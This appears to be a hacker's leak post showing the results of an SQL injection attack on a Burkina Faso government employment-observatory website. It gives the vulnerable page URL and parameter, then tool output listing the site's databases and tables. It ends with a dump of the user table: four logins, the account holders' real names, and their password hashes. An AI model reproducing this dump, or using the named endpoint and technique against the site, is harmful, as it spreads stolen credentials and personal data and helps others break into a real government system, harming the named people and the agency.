.bf Burkina Faso

ISP: Onatel Burkina Faso

NATIONAL OBSERVATORY FOR EMPLOYMENT AND TRAINING

Observe well to inform, act and anticipate

ONEF, Information on job vacancies, Statistics on the labor market

http://www.onef.gov.bf/emploi/details.php?art=30554

available databases [2]:                                                                                                                                             
[+] information_schema
[+] onef

Database: onef                                                                                                                                                       
[7 tables]
+-----------+
| user      |
| actualite |
| agenda    |
| album     |
| document  |
| ecrire    |
| emploi    |
+-----------+

Database: onef                                                                                                                                                       
Table: user
[4 entries]
+------------+----------------+----------------+---------------+
| login      | NomUser        | PrenomUser     | mdp           |
+------------+----------------+----------------+---------------+
| admin      | Administrateur | Administrateur | ad.isyLeoF6TU |
| kambouw    | KAMBOU         | William        | ka46kCxQOu79s |
| DOAMBA     | DOAMBA         | REINE          | DO6XNCWaRqEf6 |
| milie_yams | YAMEOGO        | Emilienne      | miQRvocOzDgXk |
+------------+----------------+----------------+---------------+
